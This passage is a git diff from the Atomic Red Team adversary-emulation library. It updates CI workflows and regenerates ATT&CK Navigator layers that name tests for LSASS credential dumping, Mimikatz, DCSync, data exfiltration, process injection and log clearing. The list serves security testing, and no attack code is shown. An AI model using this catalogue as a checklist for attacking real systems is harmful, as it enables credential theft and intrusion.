diff --git a/.github/workflows/assign-labels.yml b/.github/workflows/assign-labels.yml
index cb1e2ab8..1218c71f 100644
--- a/.github/workflows/assign-labels.yml
+++ b/.github/workflows/assign-labels.yml
@@ -2,7 +2,7 @@ name: assign-labels
on:
workflow_run:
- workflows: [ "validate-atomics" ]
+ workflows: ["validate-atomics"]
types:
- completed
@@ -56,4 +56,4 @@ jobs:
repo: context.repo.repo,
assignees: obj.maintainers
});
- }
\ No newline at end of file
+ }
diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml
index e07a9c62..48ffa3ee 100644
--- a/.github/workflows/generate-counter.yml
+++ b/.github/workflows/generate-counter.yml
@@ -2,26 +2,29 @@ name: generate-svg-counter
on:
push:
- branches:
- - master
+ branches: ["master"]
jobs:
generate-counter:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
+ with:
+ token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+ - name: Install poetry
+ run: pipx install poetry
- uses: actions/setup-python@v4
with:
python-version: '3.11.2'
cache: 'poetry'
+ - name: Install dependencies
+ run: poetry install --no-interaction --no-root
- name: Generate shields.io URL
- run: python generate_shield.py atomics/
- id: shield
- - name: Generate shields.io URL
- run: python generate_counter.py -d atomics/
+ run: poetry run python bin/generate_counter.py -f atomics/
id: counter
- name: Update README
run: |
+ echo ${{ steps.counter.outputs.result }}
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: update github with new site
@@ -34,4 +37,4 @@ jobs:
git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
# push quietly to prevent showing the token in log
# no need to provide any credentials
- git push
+ git push --force
\ No newline at end of file
diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml
index 64798f65..12abe48b 100644
--- a/.github/workflows/generate-docs.yml
+++ b/.github/workflows/generate-docs.yml
@@ -1,18 +1,16 @@
name: generate-docs
on:
push:
- branches:
- - master
+ branches: ["master"]
+
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
- uses: actions/checkout@v2
- with:
+ uses: actions/checkout@v3
+ with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
- ref: 'master'
-
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
diff --git a/README.md b/README.md
index 7aefbea9..e1de8ff8 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,9 @@
# Atomic Red Team
- 
+  
+
+
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index e370bd72..c3e00fad 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 578d690f..2f79a43a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":37,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":12,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":6,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"comment":"\n- Process Injection via C#\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View 